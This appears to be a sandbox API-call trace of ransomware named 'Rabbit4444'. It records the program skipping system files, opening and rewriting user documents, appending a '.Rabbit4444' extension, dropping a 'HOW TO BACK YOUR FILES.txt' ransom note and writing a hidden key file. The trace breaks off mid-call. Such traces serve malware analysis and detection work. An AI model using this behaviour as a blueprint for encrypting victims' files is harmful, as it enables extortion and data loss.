[0049.649] lstrcmpiW (lpString1="h_uO.xls", lpString2="pagefile.sys") returned -1 [0049.649] lstrcmpiW (lpString1="h_uO.xls", lpString2="boot") returned 1 [0049.649] lstrcmpiW (lpString1="h_uO.xls", lpString2="ids.txt") returned -1 [0049.649] lstrcmpiW (lpString1="h_uO.xls", lpString2="NTUSER.DAT") returned -1 [0049.649] lstrcpyW (in: lpString1=0x130eba6, lpString2="h_uO.xls" | out: lpString1="h_uO.xls") returned="h_uO.xls" [0049.649] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\u-1JZ4Ru824_HpbNp\\EYPPTs4FJO\\h_uO.xls", dwFileAttributes=0x0) returned 1 [0049.649] lstrlenW (lpString="h_uO.xls") returned 8 [0049.649] lstrlenW (lpString="Rabbit4444") returned 10 [0049.649] lstrcmpiW (lpString1="", lpString2="Rabbit4444") returned -1 [0049.649] lstrlenW (lpString=".dll") returned 4 [0049.649] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0049.649] lstrlenW (lpString=".lnk") returned 4 [0049.649] lstrcmpiW (lpString1=".xls", lpString2=".lnk") returned 1 [0049.649] lstrlenW (lpString=".ini") returned 4 [0049.649] lstrcmpiW (lpString1=".xls", lpString2=".ini") returned 1 [0049.649] lstrlenW (lpString=".sys") returned 4 [0049.649] lstrcmpiW (lpString1=".xls", lpString2=".sys") returned 1 [0049.649] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\u-1JZ4Ru824_HpbNp\\EYPPTs4FJO\\h_uO.xls" (normalized: "c:\\users\\fd1hvy\\documents\\u-1jz4ru824_hpbnp\\eyppts4fjo\\h_uo.xls"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0049.649] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0049.649] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14096012945) returned 1 [0049.649] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=18011) returned 1 [0049.649] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1176f8 [0049.650] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101a68 [0049.650] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x4960, lpName=0x0) returned 0x298 [0049.650] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4960) returned 0x70000 [0049.650] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0049.650] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0049.650] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0049.650] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0049.650] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0049.651] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0049.651] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0049.651] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0049.651] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14096158628) returned 1 [0049.651] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1176f8 | out: hHeap=0xe0000) returned 1 [0049.651] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101a68 | out: hHeap=0xe0000) returned 1 [0049.651] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0049.651] CloseHandle (hObject=0x298) returned 1 [0049.651] CloseHandle (hObject=0x278) returned 1 [0049.652] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Documents\\u-1JZ4Ru824_HpbNp\\EYPPTs4FJO\\h_uO.xls.Rabbit4444") returned 74 [0049.652] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\u-1JZ4Ru824_HpbNp\\EYPPTs4FJO\\h_uO.xls" (normalized: "c:\\users\\fd1hvy\\documents\\u-1jz4ru824_hpbnp\\eyppts4fjo\\h_uo.xls"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\u-1JZ4Ru824_HpbNp\\EYPPTs4FJO\\h_uO.xls.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\documents\\u-1jz4ru824_hpbnp\\eyppts4fjo\\h_uo.xls.rabbit4444"), dwFlags=0x1) returned 1 [0049.652] InterlockedExchangeAdd (in: Addend=0xff618, Value=18016 | out: Addend=0xff618) returned 22675568 [0049.652] InterlockedExchangeAdd (in: Addend=0xff624, Value=1 | out: Addend=0xff624) returned 3636 [0049.652] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9d8e0fb0, ftCreationTime.dwHighDateTime=0x1d4d48c, ftLastAccessTime.dwLowDateTime=0x2880f4d0, ftLastAccessTime.dwHighDateTime=0x1d4c645, ftLastWriteTime.dwLowDateTime=0x2880f4d0, ftLastWriteTime.dwHighDateTime=0x1d4c645, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MMADP1Sx8P2k7", cAlternateFileName="MMADP1~1")) returned 1 [0049.653] lstrcmpiW (lpString1="MMADP1Sx8P2k7", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0049.653] lstrcmpiW (lpString1="MMADP1Sx8P2k7", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0049.653] lstrcmpiW (lpString1="MMADP1Sx8P2k7", lpString2="Rabbit4444.exe") returned -1 [0049.653] lstrcmpiW (lpString1="MMADP1Sx8P2k7", lpString2=".") returned 1 [0049.653] lstrcmpiW (lpString1="MMADP1Sx8P2k7", lpString2="..") returned 1 [0049.653] lstrcmpiW (lpString1="MMADP1Sx8P2k7", lpString2="windows") returned -1 [0049.653] lstrcmpiW (lpString1="MMADP1Sx8P2k7", lpString2="bootmgr") returned 1 [0049.653] lstrcmpiW (lpString1="MMADP1Sx8P2k7", lpString2="pagefile.sys") returned -1 [0049.653] lstrcmpiW (lpString1="MMADP1Sx8P2k7", lpString2="boot") returned 1 [0049.653] lstrcmpiW (lpString1="MMADP1Sx8P2k7", lpString2="ids.txt") returned 1 [0049.653] lstrcmpiW (lpString1="MMADP1Sx8P2k7", lpString2="NTUSER.DAT") returned -1 [0049.653] lstrcpyW (in: lpString1=0x130eba6, lpString2="MMADP1Sx8P2k7" | out: lpString1="MMADP1Sx8P2k7") returned="MMADP1Sx8P2k7" [0049.653] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf6568 [0049.653] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x8a) returned 0x11ed60 [0049.653] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf6570 | out: ListHead=0xf68b0, ListEntry=0xf6570) returned 0xf63b0 [0049.653] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x79d1da90, ftCreationTime.dwHighDateTime=0x1d4d197, ftLastAccessTime.dwLowDateTime=0xcb70e720, ftLastAccessTime.dwHighDateTime=0x1d4cb60, ftLastWriteTime.dwLowDateTime=0xcb70e720, ftLastWriteTime.dwHighDateTime=0x1d4cb60, nFileSizeHigh=0x0, nFileSizeLow=0x7807, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SBk5RPRd5SSmk r6MsO.pptx", cAlternateFileName="SBK5RP~1.PPT")) returned 1 [0049.653] lstrcmpiW (lpString1="SBk5RPRd5SSmk r6MsO.pptx", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0049.653] lstrcmpiW (lpString1="SBk5RPRd5SSmk r6MsO.pptx", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0049.653] lstrcmpiW (lpString1="SBk5RPRd5SSmk r6MsO.pptx", lpString2="Rabbit4444.exe") returned 1 [0049.653] lstrcmpiW (lpString1="SBk5RPRd5SSmk r6MsO.pptx", lpString2=".") returned 1 [0049.653] lstrcmpiW (lpString1="SBk5RPRd5SSmk r6MsO.pptx", lpString2="..") returned 1 [0049.653] lstrcmpiW (lpString1="SBk5RPRd5SSmk r6MsO.pptx", lpString2="windows") returned -1 [0049.653] lstrcmpiW (lpString1="SBk5RPRd5SSmk r6MsO.pptx", lpString2="bootmgr") returned 1 [0049.653] lstrcmpiW (lpString1="SBk5RPRd5SSmk r6MsO.pptx", lpString2="pagefile.sys") returned 1 [0049.653] lstrcmpiW (lpString1="SBk5RPRd5SSmk r6MsO.pptx", lpString2="boot") returned 1 [0049.653] lstrcmpiW (lpString1="SBk5RPRd5SSmk r6MsO.pptx", lpString2="ids.txt") returned 1 [0049.653] lstrcmpiW (lpString1="SBk5RPRd5SSmk r6MsO.pptx", lpString2="NTUSER.DAT") returned 1 [0049.653] lstrcpyW (in: lpString1=0x130eba6, lpString2="SBk5RPRd5SSmk r6MsO.pptx" | out: lpString1="SBk5RPRd5SSmk r6MsO.pptx") returned="SBk5RPRd5SSmk r6MsO.pptx" [0049.653] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\u-1JZ4Ru824_HpbNp\\EYPPTs4FJO\\SBk5RPRd5SSmk r6MsO.pptx", dwFileAttributes=0x0) returned 1 [0049.654] lstrlenW (lpString="SBk5RPRd5SSmk r6MsO.pptx") returned 24 [0049.654] lstrlenW (lpString="Rabbit4444") returned 10 [0049.654] lstrcmpiW (lpString1="r6MsO.pptx", lpString2="Rabbit4444") returned -1 [0049.654] lstrlenW (lpString=".dll") returned 4 [0049.654] lstrcmpiW (lpString1="pptx", lpString2=".dll") returned 1 [0049.654] lstrlenW (lpString=".lnk") returned 4 [0049.654] lstrcmpiW (lpString1="pptx", lpString2=".lnk") returned 1 [0049.654] lstrlenW (lpString=".ini") returned 4 [0049.654] lstrcmpiW (lpString1="pptx", lpString2=".ini") returned 1 [0049.654] lstrlenW (lpString=".sys") returned 4 [0049.654] lstrcmpiW (lpString1="pptx", lpString2=".sys") returned 1 [0049.654] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\u-1JZ4Ru824_HpbNp\\EYPPTs4FJO\\SBk5RPRd5SSmk r6MsO.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\u-1jz4ru824_hpbnp\\eyppts4fjo\\sbk5rprd5ssmk r6mso.pptx"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0049.654] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0049.654] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14096477374) returned 1 [0049.654] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=30727) returned 1 [0049.654] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117ba8 [0049.654] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101af0 [0049.654] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x7b10, lpName=0x0) returned 0x298 [0049.654] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7b10) returned 0x70000 [0049.686] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0049.686] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0049.686] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0049.686] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0049.686] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0049.687] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0049.687] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0049.687] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0049.687] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14099785047) returned 1 [0049.687] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117ba8 | out: hHeap=0xe0000) returned 1 [0049.687] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101af0 | out: hHeap=0xe0000) returned 1 [0049.687] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0049.688] CloseHandle (hObject=0x298) returned 1 [0049.688] CloseHandle (hObject=0x278) returned 1 [0049.688] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Documents\\u-1JZ4Ru824_HpbNp\\EYPPTs4FJO\\SBk5RPRd5SSmk r6MsO.pptx.Rabbit4444") returned 90 [0049.688] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\u-1JZ4Ru824_HpbNp\\EYPPTs4FJO\\SBk5RPRd5SSmk r6MsO.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\u-1jz4ru824_hpbnp\\eyppts4fjo\\sbk5rprd5ssmk r6mso.pptx"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\u-1JZ4Ru824_HpbNp\\EYPPTs4FJO\\SBk5RPRd5SSmk r6MsO.pptx.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\documents\\u-1jz4ru824_hpbnp\\eyppts4fjo\\sbk5rprd5ssmk r6mso.pptx.rabbit4444"), dwFlags=0x1) returned 1 [0049.689] InterlockedExchangeAdd (in: Addend=0xff618, Value=30736 | out: Addend=0xff618) returned 22693584 [0049.689] InterlockedExchangeAdd (in: Addend=0xff624, Value=33 | out: Addend=0xff624) returned 3637 [0049.689] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x79d1da90, ftCreationTime.dwHighDateTime=0x1d4d197, ftLastAccessTime.dwLowDateTime=0xcb70e720, ftLastAccessTime.dwHighDateTime=0x1d4cb60, ftLastWriteTime.dwLowDateTime=0xcb70e720, ftLastWriteTime.dwHighDateTime=0x1d4cb60, nFileSizeHigh=0x0, nFileSizeLow=0x7807, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SBk5RPRd5SSmk r6MsO.pptx", cAlternateFileName="SBK5RP~1.PPT")) returned 0 [0049.689] FindClose (in: hFindFile=0x102a90 | out: hFindFile=0x102a90) returned 1 [0049.689] lstrcpyW (in: lpString1=0x130eba6, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0049.689] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\u-1JZ4Ru824_HpbNp\\EYPPTs4FJO\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\documents\\u-1jz4ru824_hpbnp\\eyppts4fjo\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0049.689] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0049.689] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0049.690] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0049.690] CloseHandle (hObject=0x278) returned 1 [0049.690] CloseHandle (hObject=0x27c) returned 1 [0049.690] GetCurrentThreadId () returned 0xd98 [0049.691] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xf6570 [0049.691] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\Documents\\u-1JZ4Ru824_HpbNp\\EYPPTs4FJO\\MMADP1Sx8P2k7", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\Documents\\u-1JZ4Ru824_HpbNp\\EYPPTs4FJO\\MMADP1Sx8P2k7") returned="C:\\Users\\FD1HVy\\Documents\\u-1JZ4Ru824_HpbNp\\EYPPTs4FJO\\MMADP1Sx8P2k7" [0049.691] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11ed60 | out: hHeap=0xe0000) returned 1 [0049.691] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6568 | out: hHeap=0xe0000) returned 1 [0049.691] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\Documents\\u-1JZ4Ru824_HpbNp\\EYPPTs4FJO\\MMADP1Sx8P2k7" | out: lpString1="C:\\Users\\FD1HVy\\Documents\\u-1JZ4Ru824_HpbNp\\EYPPTs4FJO\\MMADP1Sx8P2k7") returned="C:\\Users\\FD1HVy\\Documents\\u-1JZ4Ru824_HpbNp\\EYPPTs4FJO\\MMADP1Sx8P2k7" [0049.691] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\Documents\\u-1JZ4Ru824_HpbNp\\EYPPTs4FJO\\MMADP1Sx8P2k7", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\Documents\\u-1JZ4Ru824_HpbNp\\EYPPTs4FJO\\MMADP1Sx8P2k7\\") returned="C:\\Users\\FD1HVy\\Documents\\u-1JZ4Ru824_HpbNp\\EYPPTs4FJO\\MMADP1Sx8P2k7\\" [0049.691] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\Documents\\u-1JZ4Ru824_HpbNp\\EYPPTs4FJO\\MMADP1Sx8P2k7\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\Documents\\u-1JZ4Ru824_HpbNp\\EYPPTs4FJO\\MMADP1Sx8P2k7\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\Documents\\u-1JZ4Ru824_HpbNp\\EYPPTs4FJO\\MMADP1Sx8P2k7\\.BFC0E91B00AE8A0620D3" [0049.691] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\u-1JZ4Ru824_HpbNp\\EYPPTs4FJO\\MMADP1Sx8P2k7\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\documents\\u-1jz4ru824_hpbnp\\eyppts4fjo\\mmadp1sx8p2k7\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0049.692] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0049.694] FlushFileBuffers (hFile=0x27c) returned 1 [0049.695] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\u-1JZ4Ru824_HpbNp\\EYPPTs4FJO\\MMADP1Sx8P2k7\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0049.695] CloseHandle (hObject=0x27c) returned 1 [0049.696] lstrlenW (lpString="C:\\Users\\FD1HVy\\Documents\\u-1JZ4Ru824_HpbNp\\EYPPTs4FJO\\MMADP1Sx8P2k7") returned 68 [0049.696] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0049.696] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\u-1JZ4Ru824_HpbNp\\EYPPTs4FJO\\MMADP1Sx8P2k7\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9d8e0fb0, ftCreationTime.dwHighDateTime=0x1d4d48c, ftLastAccessTime.dwLowDateTime=0x2880f4d0, ftLastAccessTime.dwHighDateTime=0x1d4c645, ftLastWriteTime.dwLowDateTime=0xe6f18495, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1027d0 [0049.696] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0049.696] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0049.696] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0049.696] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0049.696] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9d8e0fb0, ftCreationTime.dwHighDateTime=0x1d4d48c, ftLastAccessTime.dwLowDateTime=0x2880f4d0, ftLastAccessTime.dwHighDateTime=0x1d4c645, ftLastWriteTime.dwLowDateTime=0xe6f18495, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0049.696] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0049.696] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0049.696] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0049.696] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0049.696] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0049.696] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe6f18495, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe6f18495, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe6f18495, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0049.696] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0049.696] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0049.696] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90b53590, ftCreationTime.dwHighDateTime=0x1d4d43f, ftLastAccessTime.dwLowDateTime=0xd9dd1260, ftLastAccessTime.dwHighDateTime=0x1d4d377, ftLastWriteTime.dwLowDateTime=0xd9dd1260, ftLastWriteTime.dwHighDateTime=0x1d4d377, nFileSizeHigh=0x0, nFileSizeLow=0xcbab, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="5UIIwxxuSCwYbi_fDL.odp", cAlternateFileName="5UIIWX~1.ODP")) returned 1 [0049.696] lstrcmpiW (lpString1="5UIIwxxuSCwYbi_fDL.odp", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0049.696] lstrcmpiW (lpString1="5UIIwxxuSCwYbi_fDL.odp", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0049.696] lstrcmpiW (lpString1="5UIIwxxuSCwYbi_fDL.odp", lpString2="Rabbit4444.exe") returned -1 [0049.696] lstrcmpiW (lpString1="5UIIwxxuSCwYbi_fDL.odp", lpString2=".") returned 1 [0049.696] lstrcmpiW (lpString1="5UIIwxxuSCwYbi_fDL.odp", lpString2="..") returned 1 [0049.696] lstrcmpiW (lpString1="5UIIwxxuSCwYbi_fDL.odp", lpString2="windows") returned -1 [0049.696] lstrcmpiW (lpString1="5UIIwxxuSCwYbi_fDL.odp", lpString2="bootmgr") returned -1 [0049.697] lstrcmpiW (lpString1="5UIIwxxuSCwYbi_fDL.odp", lpString2="pagefile.sys") returned -1 [0049.697] lstrcmpiW (lpString1="5UIIwxxuSCwYbi_fDL.odp", lpString2="boot") returned -1 [0049.697] lstrcmpiW (lpString1="5UIIwxxuSCwYbi_fDL.odp", lpString2="ids.txt") returned -1 [0049.697] lstrcmpiW (lpString1="5UIIwxxuSCwYbi_fDL.odp", lpString2="NTUSER.DAT") returned -1 [0049.697] lstrcpyW (in: lpString1=0x130ebc2, lpString2="5UIIwxxuSCwYbi_fDL.odp" | out: lpString1="5UIIwxxuSCwYbi_fDL.odp") returned="5UIIwxxuSCwYbi_fDL.odp" [0049.697] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\u-1JZ4Ru824_HpbNp\\EYPPTs4FJO\\MMADP1Sx8P2k7\\5UIIwxxuSCwYbi_fDL.odp", dwFileAttributes=0x0) returned 1 [0049.697] lstrlenW (lpString="5UIIwxxuSCwYbi_fDL.odp") returned 22 [0049.697] lstrlenW (lpString="Rabbit4444") returned 10 [0049.697] lstrcmpiW (lpString1="bi_fDL.odp", lpString2="Rabbit4444") returned -1 [0049.697] lstrlenW (lpString=".dll") returned 4 [0049.697] lstrcmpiW (lpString1=".odp", lpString2=".dll") returned 1 [0049.697] lstrlenW (lpString=".lnk") returned 4 [0049.697] lstrcmpiW (lpString1=".odp", lpString2=".lnk") returned 1 [0049.697] lstrlenW (lpString=".ini") returned 4 [0049.697] lstrcmpiW (lpString1=".odp", lpString2=".ini") returned 1 [0049.697] lstrlenW (lpString=".sys") returned 4 [0049.697] lstrcmpiW (lpString1=".odp", lpString2=".sys") returned -1 [0049.697] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\u-1JZ4Ru824_HpbNp\\EYPPTs4FJO\\MMADP1Sx8P2k7\\5UIIwxxuSCwYbi_fDL.odp" (normalized: "c:\\users\\fd1hvy\\documents\\u-1jz4ru824_hpbnp\\eyppts4fjo\\mmadp1sx8p2k7\\5uiiwxxuscwybi_fdl.odp"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0049.697] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0049.697] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14100811043) returned 1 [0049.697] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=52139) returned 1 [0049.697] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117ba8 [0049.697] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101fb8 [0049.698] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xceb0, lpName=0x0) returned 0x298 [0049.698] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xceb0) returned 0x70000 [0049.699] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0049.699] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0049.699] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0049.699] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108f10 [0049.699] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0049.699] HeapFree (in: 